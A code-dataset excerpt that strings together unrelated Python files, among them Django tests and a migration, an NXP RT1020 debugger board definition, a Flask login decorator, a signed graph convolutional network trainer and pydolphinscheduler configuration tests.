        super().include_null_properties(include_null_properties=include_null_properties)
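# Illustrative usage sketch (not part of the original source); it assumes the
# spark_auto_mapper_fhir package is installed and that FhirString/FhirDateTime
# accept plain Python values, and the extension URL below is hypothetical:
#
#   extension = BaseExtensionItem(
#       url="http://example.com/fhir/StructureDefinition/recorded-note",
#       valueString=FhirString("example note"),
#   )
#
# valueDateTime works the same way; both values are forwarded unchanged to
# ExtensionBase.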
|
StarcoderdataPython
|
3434963
|
from django.test import TestCase
from accounts.models import UserProfile
from django.contrib.auth.models import User
from django.urls import reverse
class TestPost(TestCase):
@classmethod
def setUpTestData(cls):
test_user = User(username='test_user',
email='<EMAIL>',
password='password')
test_user.save()
def test_user_get_absolute_url(self):
user = User.objects.get(pk=1)
self.assertEqual(user.profile.get_absolute_url(), '/profile/test_user/')
def test_creation_user_profile(self):
user = User.objects.create(username='test')
self.assertTrue(UserProfile.objects.filter(user=user).exists())
|
StarcoderdataPython
|
1907678
|
#-----------------------------------------------------------------------------
"""
MIMXRT-1020-EVK Evaluation Kit (i.MX RT1020)
SoC: NXP PIMXRT1021DAG5A
SDRAM: ISSI IS42S16160J-6TLI
CODEC: Cirrus Logic WM8960G
Ethernet Phy: Microchip KSZ8081
"""
#-----------------------------------------------------------------------------
import cli
import cortexm
import mem
import soc
import vendor.nxp.imxrt as imxrt
import vendor.nxp.firmware as firmware
import vendor.nxp.flexspi as flexspi
#-----------------------------------------------------------------------------
soc_name = 'MIMXRT1021DAG5A'
prompt = 'rt1020'
#-----------------------------------------------------------------------------
# cmsis-dap device
default_itf = {
#'name': 'cmsis-dap',
'name': 'jlink',
}
#-----------------------------------------------------------------------------
class target:
"""rt1020 - NXP i.MX RT1020 Evaluation Kit"""
def __init__(self, ui, dbgio):
self.ui = ui
self.dbgio = dbgio
self.device = imxrt.get_device(self.ui, soc_name)
self.dbgio.connect(self.device.cpu_info.name, 'swd')
self.cpu = cortexm.cortexm(self, ui, self.dbgio, self.device)
self.device.bind_cpu(self.cpu)
self.mem = mem.mem(self.cpu)
self.fw = firmware.firmware(self.cpu)
self.flexspi = flexspi.flexspi(self.device)
self.menu_root = (
('cpu', self.cpu.menu, 'cpu functions'),
('da', self.cpu.cmd_disassemble, cortexm.help_disassemble),
('debugger', self.dbgio.menu, 'debugger functions'),
('exit', self.cmd_exit),
('flexspi', self.flexspi.menu, 'flexspi functions'),
('fw', self.fw.menu, 'firmware functions'),
('go', self.cpu.cmd_go),
('halt', self.cpu.cmd_halt),
('help', self.ui.cmd_help),
('history', self.ui.cmd_history, cli.history_help),
('map', self.device.cmd_map),
('mem', self.mem.menu, 'memory functions'),
('regs', self.cmd_regs, soc.help_regs),
('vtable', self.cpu.cmd_vtable),
)
self.ui.cli.set_root(self.menu_root)
self.set_prompt()
self.dbgio.cmd_info(self.ui, None)
def cmd_regs(self, ui, args):
"""display registers"""
if len(args) == 0:
self.cpu.cmd_regs(ui, args)
else:
self.device.cmd_regs(ui, args)
def set_prompt(self):
"""set the command prompt"""
indicator = ('*', '')[self.dbgio.is_halted()]
self.ui.cli.set_prompt('%s%s> ' % (prompt, indicator))
def cmd_exit(self, ui, args):
"""exit application"""
self.dbgio.disconnect()
ui.exit()
#-----------------------------------------------------------------------------
# QSPI Flash, IS25LP064A-JBLE
# FlexSPI_D3_A, GPIO_SD_B1_06
# FlexSPI_CLK, GPIO_SD_B1_07
# FlexSPI_D0_A, GPIO_SD_B1_08
# FlexSPI_D2_A, GPIO_SD_B1_09
# FlexSPI_D1_A, GPIO_SD_B1_10
# FlexSPI_SS0, GPIO_SD_B1_11
#-----------------------------------------------------------------------------
|
StarcoderdataPython
|
1721008
|
import math
import numpy as np
import matplotlib.pyplot as plt
import numerical_solvers as ns
'''General functions for formatting, printing and plotting output'''
def PrintHeader():
'''Prints header information'''
#TODO: (Extend and edit as you see fit to help you debug your methods)
print("x \t EXACT \t y(Euler) \t % Error(Euler) ")
print("--- \t ----- \t\t ----- \t\t -------------- ")
def PrintIt(x,y_e, y):
'''Prints and formats a row of y values for a given x'''
#TODO: (Extend and edit as you see fit to help you debug your methods)
print("{0:4.1f} \t {1:6.10f} \t {2:6.10f} \t {3:6.3f}%".format(x, y_e, y, ns.error(y_e, y) * 100))
def PrintAll(X,Y,Y_e):
'''Prints debugging data to terminal'''
#TODO: (Extend and edit as you see fit to help you debug your methods)
PrintHeader()
for i in range(0,len(X)):
PrintIt(X[i], Y_e[i], Y[i])
def PrintToFile(name, path=''):
'''Prints caculated data to file'''
#TODO: Extend this to have the functionality to print to file (with an optional path)
return None
def Plot(X,Y,c,m=''):
'''Plots caculated data to chart'''
#TODO: (Extend and edit as you see fit to help visualize your work)
    plt.plot(X, Y, color=c, marker=m, linestyle='-')
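# Illustrative usage sketch (not part of the original source).  It relies on
# numerical_solvers providing error() as already used in PrintIt() above; the
# arrays below are made up purely to exercise the helpers.
if __name__ == '__main__':
    X = np.linspace(0.0, 1.0, 5)      # sample points
    Y_exact = np.exp(X)               # stand-in for the analytic solution
    Y_euler = Y_exact * 1.01          # stand-in for the numerical solution
    PrintAll(X, Y_euler, Y_exact)     # tabulate values and % error
    Plot(X, Y_exact, 'k')             # exact curve in black
    Plot(X, Y_euler, 'r', 'o')        # numerical curve in red with markers
    plt.show()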
|
StarcoderdataPython
|
9703875
|
<filename>utils/sso.py<gh_stars>10-100
# -*- coding: utf-8 -*-
import json
from urllib import urlencode
from urllib2 import urlopen
from functools import wraps
from urlparse import urlparse, parse_qs
from flask import redirect, request, session, jsonify, abort
from modules import Admin, Cluster, Msg
def logout(user):
session.pop('user', None)
return redirect('/Login')
def require_login(f):
@wraps(f)
def decorated_function(*args, **kwargs):
if 'user' not in session:
return redirect('/Login')
user = session['user']
user_data = Admin.get(nid=user['nid'], status=1)
user['msg'] = []
user['cluster'] = []
clusters_data = Cluster.get_all(status=1)
msg = Msg.get_all(status=1, msg_status=1, user=user['nid'])
for a in clusters_data:
if a.status == 1:
                # sort clusters by creation time
clusters = {'name': a.name, 'id': a.id, 'nid': a.nid, 'gmt_created': a.gmt_created}
user['cluster'].append(clusters)
user['cluster'].sort(key=lambda x: x['gmt_created'], reverse=False)
user['msg_num'] = len(msg)
for m in msg[0:3]:
try:
user['msg'].append({
'nid': m.nid,
'time': m.gmt_created,
'content': json.loads(m.content),
'genre': m.genre
})
except Exception as e:
str(e)
kwargs['user'] = user
return f(*args, **kwargs)
return decorated_function
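# Illustrative usage sketch (not part of the original source); the route and
# template names are hypothetical.  require_login redirects anonymous users
# to /Login and injects the enriched session user into the view as `user`:
#
#   from flask import Flask, render_template
#
#   app = Flask(__name__)
#
#   @app.route('/dashboard')
#   @require_login
#   def dashboard(user=None):
#       # `user` carries the 'cluster', 'msg' and 'msg_num' keys filled above
#       return render_template('dashboard.html', user=user)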
|
StarcoderdataPython
|
3491661
|
<gh_stars>10-100
import numpy as np
from visual_dynamics.utils import transformations as tf
from visual_dynamics.spaces import Space
class AxisAngleSpace(Space):
"""
SO(3) space where the rotation is represented as an axis-angle vector in
R^3 where its magnitude is constrained within an interval and the axis can
optionally be constrained. If the axis is not constrained, then the
absolute value of low and high should be equal to each other.
"""
def __init__(self, low, high, axis=None):
"""
TODO: handle angle wrap-around
"""
self.low = np.squeeze(low)[None]
self.high = np.squeeze(high)[None]
if self.low.shape != (1,) or self.high.shape != (1,):
raise ValueError("low and high should each contain a single number or be a single number")
self.axis = axis / np.linalg.norm(axis) if axis is not None else None
if self.axis is None:
assert -self.low == self.high
def sample(self):
if self.axis is None:
axis_angle = tf.axis_angle_from_matrix(tf.random_rotation_matrix())
axis, angle = tf.split_axis_angle(axis_angle)
if not (self.low <= angle <= self.high):
# rescale angle from [-pi, pi) to [-low_angle, high_angle)
angle = self.low + (self.high - self.low) * (angle + np.pi) / (2 * np.pi)
return angle * axis
else:
angle = np.random.uniform(low=self.low, high=self.high, size=self.shape)
return angle
def contains(self, x):
angle = np.linalg.norm(x)
return x.shape == self.shape and (self.low <= angle <= self.high)
def clip(self, x, out=None):
assert x.shape == self.shape
if self.axis is None:
axis, angle = tf.split_axis_angle(x)
x_clipped = np.clip(angle, self.low, self.high) * axis
else:
x_clipped = np.clip(x, self.low, self.high)
if out is not None:
out[:] = x_clipped
x_clipped = out
return x_clipped
@property
def shape(self):
"""
shape of data that this space handles
"""
if self.axis is None:
return (3,)
else:
return (1,)
def _get_config(self):
config = super(AxisAngleSpace, self)._get_config()
config.update({'low': np.asscalar(self.low),
'high': np.asscalar(self.high),
'axis': self.axis.tolist() if self.axis is not None else None})
return config
@staticmethod
def create(other):
return AxisAngleSpace(other.low, other.high, axis=other.axis)
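# Illustrative usage sketch (not part of the original source); the numbers are
# arbitrary and it assumes the visual_dynamics package imported above is
# available.  With a fixed axis the space is effectively 1-D (just the angle);
# with axis=None samples are full 3-D axis-angle vectors.
if __name__ == '__main__':
    # rotation about the z-axis, angle limited to [-0.5, 0.5] radians
    z_space = AxisAngleSpace(low=-0.5, high=0.5, axis=[0.0, 0.0, 1.0])
    angle = z_space.sample()                    # shape (1,)
    print(angle, z_space.contains(angle))
    print(z_space.clip(np.array([2.0])))        # clipped down to 0.5
    # unconstrained axis: low/high must be symmetric around zero
    free_space = AxisAngleSpace(low=-np.pi, high=np.pi)
    print(free_space.sample().shape)            # (3,)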
|
StarcoderdataPython
|
12838179
|
<filename>lab1/abstractFactory.py
'''Define Abstract Factory'''
from abc import ABCMeta, abstractmethod
class Snack:
pass
class Beer:
pass
class Beer(metaclass=ABCMeta):
@abstractmethod
def interact(self, snack: Snack):
pass
class Snack(metaclass=ABCMeta):
@abstractmethod
def interact(self, beer: Beer):
pass
class Tuborg(Beer):
def interact(self, snack: Snack):
print('I buy beer {0} and {1}'.format( \
self.__class__.__name__, snack.__class__.__name__.lower()))
class Staropramen(Beer):
def interact(self, snack: Snack):
print('I buy beer {0} and {1}'.format( \
self.__class__.__name__, snack.__class__.__name__.lower()))
class AbstractShop(metaclass=ABCMeta):
@abstractmethod
def buy_beer(self) -> Beer:
pass
@abstractmethod
def buy_snack(self) -> Snack:
pass
class Peanuts(Snack):
def interact(self, beer: Beer):
print('I buy beer {0} and {1}'.format( \
beer.__class__.__name__, self.__class__.__name__.lower()))
class Chips(Snack):
def interact(self, beer: Beer):
print('I buy beer {0} and {1}'.format( \
beer.__class__.__name__, self.__class__.__name__.lower()))
class EcoMarket(AbstractShop):
def buy_beer(self) -> Beer:
return Tuborg()
def buy_snack(self) -> Snack:
return Peanuts()
class Silpo(AbstractShop):
def buy_beer(self) -> Beer:
return Staropramen()
def buy_snack(self) -> Snack:
return Chips()
'''Using AbstractFactory'''
firstShop = EcoMarket()
lastShop = Silpo()
beer = firstShop.buy_beer()
snack = lastShop.buy_snack()
snack.interact(beer)
beer.interact(snack)
beer = lastShop.buy_beer()
snack = firstShop.buy_snack()
snack.interact(beer)
beer.interact(snack)
|
StarcoderdataPython
|
9729583
|
import json
import time
import torch
import random
import numpy as np
import pandas as pd
from tqdm import trange
import torch.nn.init as init
from torch.nn import Parameter
import torch.nn.functional as F
from utils import calculate_auc, setup_features
from sklearn.model_selection import train_test_split
from signedsageconvolution import SignedSAGEConvolutionBase, SignedSAGEConvolutionDeep, ListModule
class SignedGraphConvolutionalNetwork(torch.nn.Module):
"""
Signed Graph Convolutional Network Class.
For details see: Signed Graph Convolutional Network. <NAME>, <NAME>, and <NAME> ICDM, 2018.
https://arxiv.org/abs/1808.06354
"""
def __init__(self, device, args, X):
super(SignedGraphConvolutionalNetwork, self).__init__()
"""
SGCN Initialization.
:param device: Device for calculations.
:param args: Arguments object.
:param X: Node features.
"""
self.args = args
torch.manual_seed(self.args.seed)
self.device = device
self.X = X
self.setup_layers()
def setup_layers(self):
"""
Adding Base Layers, Deep Signed GraphSAGE layers and Regression Parameters if the model is not a single layer model.
"""
self.nodes = range(self.X.shape[0])
self.neurons = self.args.layers
self.layers = len(self.neurons)
self.positive_base_aggregator = SignedSAGEConvolutionBase(self.X.shape[1]*2, self.neurons[0]).to(self.device)
self.negative_base_aggregator = SignedSAGEConvolutionBase(self.X.shape[1]*2, self.neurons[0]).to(self.device)
self.positive_aggregators = []
self.negative_aggregators = []
for i in range(1,self.layers):
self.positive_aggregators.append(SignedSAGEConvolutionDeep(3*self.neurons[i-1], self.neurons[i]).to(self.device))
self.negative_aggregators.append(SignedSAGEConvolutionDeep(3*self.neurons[i-1], self.neurons[i]).to(self.device))
self.positive_aggregators = ListModule(*self.positive_aggregators)
self.negative_aggregators = ListModule(*self.negative_aggregators)
self.regression_weights = Parameter(torch.Tensor(4*self.neurons[-1], 3))
init.xavier_normal_(self.regression_weights)
def calculate_regression_loss(self,z, target):
"""
Calculating the regression loss for all pairs of nodes.
:param z: Hidden vertex representations.
:param target: Target vector.
:return loss_term: Regression loss.
:return predictions_soft: Predictions for each vertex pair.
"""
pos = torch.cat((self.positive_z_i, self.positive_z_j),1)
neg = torch.cat((self.negative_z_i, self.negative_z_j),1)
surr_neg_i = torch.cat((self.negative_z_i, self.negative_z_k),1)
surr_neg_j = torch.cat((self.negative_z_j, self.negative_z_k),1)
surr_pos_i = torch.cat((self.positive_z_i, self.positive_z_k),1)
surr_pos_j = torch.cat((self.positive_z_j, self.positive_z_k),1)
features = torch.cat((pos,neg,surr_neg_i,surr_neg_j,surr_pos_i,surr_pos_j))
predictions = torch.mm(features,self.regression_weights)
predictions_soft = F.log_softmax(predictions, dim=1)
loss_term = F.nll_loss(predictions_soft, target)
return loss_term, predictions_soft
def calculate_positive_embedding_loss(self, z, positive_edges):
"""
Calculating the loss on the positive edge embedding distances
:param z: Hidden vertex representation.
:param positive_edges: Positive training edges.
:return loss_term: Loss value on positive edge embedding.
"""
self.positive_surrogates = [random.choice(self.nodes) for node in range(positive_edges.shape[1])]
self.positive_surrogates = torch.from_numpy(np.array(self.positive_surrogates, dtype=np.int64).T).type(torch.long).to(self.device)
positive_edges = torch.t(positive_edges)
self.positive_z_i, self.positive_z_j = z[positive_edges[:,0],:],z[positive_edges[:,1],:]
self.positive_z_k = z[self.positive_surrogates,:]
norm_i_j = torch.norm(self.positive_z_i-self.positive_z_j, 2, 1, True).pow(2)
norm_i_k = torch.norm(self.positive_z_i-self.positive_z_k, 2, 1, True).pow(2)
term = norm_i_j-norm_i_k
term[term<0] = 0
loss_term = term.mean()
return loss_term
def calculate_negative_embedding_loss(self, z, negative_edges):
"""
Calculating the loss on the negative edge embedding distances
:param z: Hidden vertex representation.
:param negative_edges: Negative training edges.
:return loss_term: Loss value on negative edge embedding.
"""
self.negative_surrogates = [random.choice(self.nodes) for node in range(negative_edges.shape[1])]
self.negative_surrogates = torch.from_numpy(np.array(self.negative_surrogates, dtype=np.int64).T).type(torch.long).to(self.device)
negative_edges = torch.t(negative_edges)
self.negative_z_i, self.negative_z_j = z[negative_edges[:,0],:], z[negative_edges[:,1],:]
self.negative_z_k = z[self.negative_surrogates,:]
norm_i_j = torch.norm(self.negative_z_i-self.negative_z_j, 2, 1, True).pow(2)
norm_i_k = torch.norm(self.negative_z_i-self.negative_z_k, 2, 1, True).pow(2)
term = norm_i_k-norm_i_j
term[term<0] = 0
loss_term = term.mean()
return loss_term
def calculate_loss_function(self, z, positive_edges, negative_edges, target):
"""
Calculating the embedding losses, regression loss and weight regularization loss.
:param z: Node embedding.
:param positive_edges: Positive edge pairs.
:param negative_edges: Negative edge pairs.
:param target: Target vector.
:return loss: Value of loss.
"""
loss_term_1 = self.calculate_positive_embedding_loss(z, positive_edges)
loss_term_2 = self.calculate_negative_embedding_loss(z, negative_edges)
regression_loss, self.predictions = self.calculate_regression_loss(z,target)
loss_term = regression_loss+self.args.lamb*(loss_term_1+loss_term_2)
return loss_term
def forward(self, positive_edges, negative_edges, target):
"""
Model forward propagation pass. Can fit deep and single layer SGCN models.
:param positive_edges: Positive edges.
:param negative_edges: Negative edges.
:param target: Target vectors.
:return loss: Loss value.
:return self.z: Hidden vertex representations.
"""
self.h_pos, self.h_neg = [],[]
self.h_pos.append(torch.tanh(self.positive_base_aggregator(self.X, positive_edges)))
self.h_neg.append(torch.tanh(self.negative_base_aggregator(self.X, negative_edges)))
for i in range(1,self.layers):
self.h_pos.append(torch.tanh(self.positive_aggregators[i-1](self.h_pos[i-1],self.h_neg[i-1], positive_edges, negative_edges)))
self.h_neg.append(torch.tanh(self.negative_aggregators[i-1](self.h_neg[i-1],self.h_pos[i-1], positive_edges, negative_edges)))
self.z = torch.cat((self.h_pos[-1], self.h_neg[-1]), 1)
loss = self.calculate_loss_function(self.z, positive_edges, negative_edges, target)
return loss, self.z
class SignedGCNTrainer(object):
"""
Object to train and score the SGCN, log the model behaviour and save the output.
"""
def __init__(self, args, edges):
"""
Constructing the trainer instance and setting up logs.
:param args: Arguments object.
:param edges: Edge data structure with positive and negative edges separated.
"""
self.args = args
self.edges = edges
self.device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
self.setup_logs()
def setup_logs(self):
"""
Creating a log dictionary.
"""
self.logs = {}
self.logs["parameters"] = vars(self.args)
self.logs["performance"] = [["Epoch","AUC","F1"]]
self.logs["training_time"] = [["Epoch","Seconds"]]
def setup_dataset(self):
"""
Creating train and test split.
"""
self.positive_edges, self.test_positive_edges = train_test_split(self.edges["positive_edges"], test_size = self.args.test_size)
self.negative_edges, self.test_negative_edges = train_test_split(self.edges["negative_edges"], test_size = self.args.test_size)
self.ecount = len(self.positive_edges + self.negative_edges)
self.X = setup_features(self.args, self.positive_edges, self.negative_edges, self.edges["ncount"])
self.positive_edges = torch.from_numpy(np.array(self.positive_edges, dtype=np.int64).T).type(torch.long).to(self.device)
self.negative_edges = torch.from_numpy(np.array(self.negative_edges, dtype=np.int64).T).type(torch.long).to(self.device)
self.y = np.array([0 if i< int(self.ecount/2) else 1 for i in range(self.ecount)] +[2]*(self.ecount*2))
self.y = torch.from_numpy(self.y).type(torch.LongTensor).to(self.device)
self.X = torch.from_numpy(self.X).float().to(self.device)
def score_model(self, epoch):
"""
Score the model on the test set edges in each epoch.
:param epoch: Epoch number.
"""
loss, self.train_z = self.model(self.positive_edges, self.negative_edges, self.y)
score_positive_edges = torch.from_numpy(np.array(self.test_positive_edges, dtype=np.int64).T).type(torch.long).to(self.device)
score_negative_edges = torch.from_numpy(np.array(self.test_negative_edges, dtype=np.int64).T).type(torch.long).to(self.device)
test_positive_z = torch.cat((self.train_z[score_positive_edges[0,:],:], self.train_z[score_positive_edges[1,:],:]),1)
test_negative_z = torch.cat((self.train_z[score_negative_edges[0,:],:], self.train_z[score_negative_edges[1,:],:]),1)
scores = torch.mm(torch.cat((test_positive_z, test_negative_z),0), self.model.regression_weights.to(self.device))
probability_scores = torch.exp(F.softmax(scores, dim=1))
predictions = probability_scores[:,0]/probability_scores[:,0:2].sum(1)
predictions = predictions.cpu().detach().numpy()
targets = [0]*len(self.test_positive_edges) + [1]*len(self.test_negative_edges)
auc, f1 = calculate_auc(targets, predictions, self.edges)
self.logs["performance"].append([epoch+1, auc, f1])
def create_and_train_model(self):
"""
Model training and scoring.
"""
print("\nTraining started.\n")
self.model = SignedGraphConvolutionalNetwork(self.device, self.args, self.X).to(self.device)
self.optimizer = torch.optim.Adam(self.model.parameters(), lr=self.args.learning_rate, weight_decay=self.args.weight_decay)
self.model.train()
self.epochs = trange(self.args.epochs, desc="Loss")
for epoch in self.epochs:
start_time = time.time()
self.optimizer.zero_grad()
loss, _ = self.model(self.positive_edges, self.negative_edges, self.y)
loss.backward()
self.epochs.set_description("SGCN (Loss=%g)" % round(loss.item(),4))
self.optimizer.step()
self.logs["training_time"].append([epoch+1,time.time()-start_time])
if self.args.test_size >0:
self.score_model(epoch)
def save_model(self):
"""
Saving the embedding and model weights.
"""
print("\nEmbedding is saved.\n")
self.train_z = self.train_z.cpu().detach().numpy()
embedding_header = ["id"] + ["x_" + str(x) for x in range(self.train_z.shape[1])]
self.train_z = np.concatenate([np.array(range(self.train_z.shape[0])).reshape(-1,1),self.train_z],axis=1)
self.train_z = pd.DataFrame(self.train_z, columns = embedding_header)
self.train_z.to_csv(self.args.embedding_path, index = None)
print("\nRegression weights are saved.\n")
self.regression_weights = self.model.regression_weights.cpu().detach().numpy().T
regression_header = ["x_" + str(x) for x in range(self.regression_weights.shape[1])]
self.regression_weights = pd.DataFrame(self.regression_weights, columns = regression_header)
self.regression_weights.to_csv(self.args.regression_weights_path, index = None)
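# Illustrative wiring sketch (not part of the original source).  The full
# argument set comes from the project's argument parser, which is not shown
# here; only attributes referenced above are listed and their values are made
# up.  `edges` must provide "positive_edges", "negative_edges" and "ncount",
# typically produced by the project's data loader.
#
#   from types import SimpleNamespace
#
#   args = SimpleNamespace(seed=42, layers=[64, 32], lamb=1.0, test_size=0.2,
#                          epochs=100, learning_rate=0.01, weight_decay=1e-5,
#                          embedding_path="embedding.csv",
#                          regression_weights_path="weights.csv")
#                          # ...plus whatever setup_features() expects
#
#   trainer = SignedGCNTrainer(args, edges)
#   trainer.setup_dataset()
#   trainer.create_and_train_model()
#   if args.test_size > 0:
#       trainer.save_model()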
|
StarcoderdataPython
|
5164940
|
<filename>src/apps/profiles/migrations/0011_auto_20200824_2337.py
# Generated by Django 3.0.9 on 2020-08-24 23:37
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('recipes', '0015_ingredient_notes'),
('profiles', '0010_auto_20200817_1355'),
]
operations = [
migrations.AddField(
model_name='profile',
name='recipes_cooked',
field=models.ManyToManyField(related_name='profile', to='recipes.Recipe'),
),
migrations.AlterField(
model_name='event',
name='only_host_inventory',
field=models.BooleanField(default=False),
),
]
|
StarcoderdataPython
|
3225594
|
<gh_stars>1-10
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Test class :mod:`pydolphinscheduler.core.configuration`' method."""
import importlib
import os
from pathlib import Path
from typing import Any
import pytest
from pydolphinscheduler.core import configuration
from pydolphinscheduler.core.configuration import (
BUILD_IN_CONFIG_PATH,
config_path,
get_single_config,
set_single_config,
)
from pydolphinscheduler.exceptions import PyDSConfException
from pydolphinscheduler.utils.yaml_parser import YamlParser
from tests.testing.constants import DEV_MODE, ENV_PYDS_HOME
from tests.testing.file import get_file_content
@pytest.fixture
def teardown_file_env():
"""Util for deleting temp configuration file and pop env var after test finish."""
yield
config_file_path = config_path()
if config_file_path.exists():
config_file_path.unlink()
os.environ.pop(ENV_PYDS_HOME, None)
@pytest.mark.parametrize(
"val, expect",
[
("1", 1),
("123", 123),
("4567", 4567),
(b"1234", 1234),
],
)
def test_get_int(val: Any, expect: int):
"""Test function :func:`configuration.get_int`."""
assert configuration.get_int(val) == expect
@pytest.mark.parametrize(
"val",
[
"a",
"1a",
"1d2",
"1723-",
],
)
def test_get_int_error(val: Any):
"""Test function :func:`configuration.get_int`."""
with pytest.raises(ValueError):
configuration.get_int(val)
@pytest.mark.parametrize(
"val, expect",
[
("t", True),
("true", True),
(1, True),
(True, True),
("f", False),
("false", False),
(0, False),
(123, False),
("abc", False),
("abc1", False),
(False, False),
],
)
def test_get_bool(val: Any, expect: bool):
"""Test function :func:`configuration.get_bool`."""
assert configuration.get_bool(val) == expect
@pytest.mark.parametrize(
"home, expect",
[
(None, "~/pydolphinscheduler/config.yaml"),
("/tmp/pydolphinscheduler", "/tmp/pydolphinscheduler/config.yaml"),
("/tmp/test_abc", "/tmp/test_abc/config.yaml"),
],
)
def test_config_path(home: Any, expect: str):
"""Test function :func:`config_path`."""
if home:
os.environ[ENV_PYDS_HOME] = home
assert Path(expect).expanduser() == configuration.config_path()
@pytest.mark.parametrize(
"home",
[
None,
"/tmp/pydolphinscheduler",
"/tmp/test_abc",
],
)
def test_init_config_file(teardown_file_env, home: Any):
"""Test init config file."""
if home:
os.environ[ENV_PYDS_HOME] = home
elif DEV_MODE:
pytest.skip(
"Avoid delete ~/pydolphinscheduler/config.yaml by accident when test locally."
)
assert not config_path().exists()
configuration.init_config_file()
assert config_path().exists()
assert get_file_content(config_path()) == get_file_content(BUILD_IN_CONFIG_PATH)
@pytest.mark.parametrize(
"home",
[
None,
"/tmp/pydolphinscheduler",
"/tmp/test_abc",
],
)
def test_init_config_file_duplicate(teardown_file_env, home: Any):
"""Test raise error with init config file which already exists."""
if home:
os.environ[ENV_PYDS_HOME] = home
elif DEV_MODE:
pytest.skip(
"Avoid delete ~/pydolphinscheduler/config.yaml by accident when test locally."
)
assert not config_path().exists()
configuration.init_config_file()
assert config_path().exists()
with pytest.raises(PyDSConfException, match=".*file already exists.*"):
configuration.init_config_file()
def test_get_configs_build_in():
"""Test function :func:`get_configs` with build-in config file."""
content = get_file_content(BUILD_IN_CONFIG_PATH)
assert YamlParser(content).src_parser == configuration.get_configs().src_parser
assert YamlParser(content).dict_parser == configuration.get_configs().dict_parser
@pytest.mark.parametrize(
"key, val, new_val",
[
("java_gateway.address", "127.0.0.1", "127.1.1.1"),
("java_gateway.port", 25333, 25555),
("java_gateway.auto_convert", True, False),
("default.user.name", "userPythonGateway", "editUserPythonGateway"),
("default.user.password", "<PASSWORD>", "editUserPythonGateway"),
(
"default.user.email",
"<EMAIL>",
"<EMAIL>",
),
("default.user.phone", 11111111111, 22222222222),
("default.user.state", 1, 0),
("default.workflow.project", "project-pydolphin", "eidt-project-pydolphin"),
("default.workflow.tenant", "tenant_pydolphin", "edit_tenant_pydolphin"),
("default.workflow.user", "userPythonGateway", "editUserPythonGateway"),
("default.workflow.queue", "queuePythonGateway", "editQueuePythonGateway"),
("default.workflow.worker_group", "default", "specific"),
("default.workflow.time_zone", "Asia/Shanghai", "Asia/Beijing"),
("default.workflow.warning_type", "NONE", "ALL"),
],
)
def test_single_config_get_set(teardown_file_env, key: str, val: Any, new_val: Any):
"""Test function :func:`get_single_config` and :func:`set_single_config`."""
assert val == get_single_config(key)
set_single_config(key, new_val)
assert new_val == get_single_config(key)
def test_single_config_get_set_not_exists_key():
"""Test function :func:`get_single_config` and :func:`set_single_config` error while key not exists."""
not_exists_key = "i_am_not_exists_key"
with pytest.raises(PyDSConfException, match=".*do not exists.*"):
get_single_config(not_exists_key)
with pytest.raises(PyDSConfException, match=".*do not exists.*"):
set_single_config(not_exists_key, not_exists_key)
@pytest.mark.parametrize(
"config_name, expect",
[
("JAVA_GATEWAY_ADDRESS", "127.0.0.1"),
("JAVA_GATEWAY_PORT", 25333),
("JAVA_GATEWAY_AUTO_CONVERT", True),
("USER_NAME", "userPythonGateway"),
("USER_PASSWORD", "<PASSWORD>"),
("USER_EMAIL", "<EMAIL>"),
("USER_PHONE", "11111111111"),
("USER_STATE", 1),
("WORKFLOW_PROJECT", "project-pydolphin"),
("WORKFLOW_TENANT", "tenant_pydolphin"),
("WORKFLOW_USER", "userPythonGateway"),
("WORKFLOW_QUEUE", "queuePythonGateway"),
("WORKFLOW_WORKER_GROUP", "default"),
("WORKFLOW_TIME_ZONE", "Asia/Shanghai"),
("WORKFLOW_WARNING_TYPE", "NONE"),
],
)
def test_get_configuration(config_name: str, expect: Any):
"""Test get exists attribute in :mod:`configuration`."""
assert expect == getattr(configuration, config_name)
@pytest.mark.parametrize(
"config_name, src, dest",
[
("JAVA_GATEWAY_ADDRESS", "127.0.0.1", "192.168.1.1"),
("JAVA_GATEWAY_PORT", 25333, 25334),
("JAVA_GATEWAY_AUTO_CONVERT", True, False),
("USER_NAME", "userPythonGateway", "envUserPythonGateway"),
("USER_PASSWORD", "<PASSWORD>", "envUserPythonGateway"),
(
"USER_EMAIL",
"<EMAIL>",
"<EMAIL>",
),
("USER_PHONE", "11111111111", "22222222222"),
("USER_STATE", 1, 0),
("WORKFLOW_PROJECT", "project-pydolphin", "env-project-pydolphin"),
("WORKFLOW_TENANT", "tenant_pydolphin", "env-tenant_pydolphin"),
("WORKFLOW_USER", "userPythonGateway", "envUserPythonGateway"),
("WORKFLOW_QUEUE", "queuePythonGateway", "envQueuePythonGateway"),
("WORKFLOW_WORKER_GROUP", "default", "custom"),
("WORKFLOW_TIME_ZONE", "Asia/Shanghai", "America/Los_Angeles"),
("WORKFLOW_WARNING_TYPE", "NONE", "ALL"),
],
)
def test_get_configuration_env(config_name: str, src: Any, dest: Any):
"""Test get exists attribute from environment variable in :mod:`configuration`."""
assert getattr(configuration, config_name) == src
env_name = f"PYDS_{config_name}"
os.environ[env_name] = str(dest)
# reload module configuration to re-get config from environment.
importlib.reload(configuration)
assert getattr(configuration, config_name) == dest
# pop and reload configuration to test whether this config equal to `src` value
os.environ.pop(env_name, None)
importlib.reload(configuration)
assert getattr(configuration, config_name) == src
assert env_name not in os.environ
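# Illustrative note (not part of the original source) summarising what the
# tests above exercise: every configuration attribute can be overridden via an
# environment variable named PYDS_<ATTRIBUTE>, for example
#
#   export PYDS_JAVA_GATEWAY_ADDRESS=192.168.1.1
#   export PYDS_WORKFLOW_TIME_ZONE=America/Los_Angeles
#
# and the override disappears again once the variable is unset and the
# configuration module is reloaded.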
|
StarcoderdataPython
|
9607763
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
The ``nti.testing`` module exposes the most commonly used API from the
submodules (for example, ``nti.testing.is_true`` is just an alias for
``nti.testing.matchers.is_true``). The submodules may contain other
functions, though, so be sure to look at their documentation.
Importing this module has side-effects when :mod:`zope.testing` is
importable:
- Add a zope.testing cleanup to ensure that transactions never
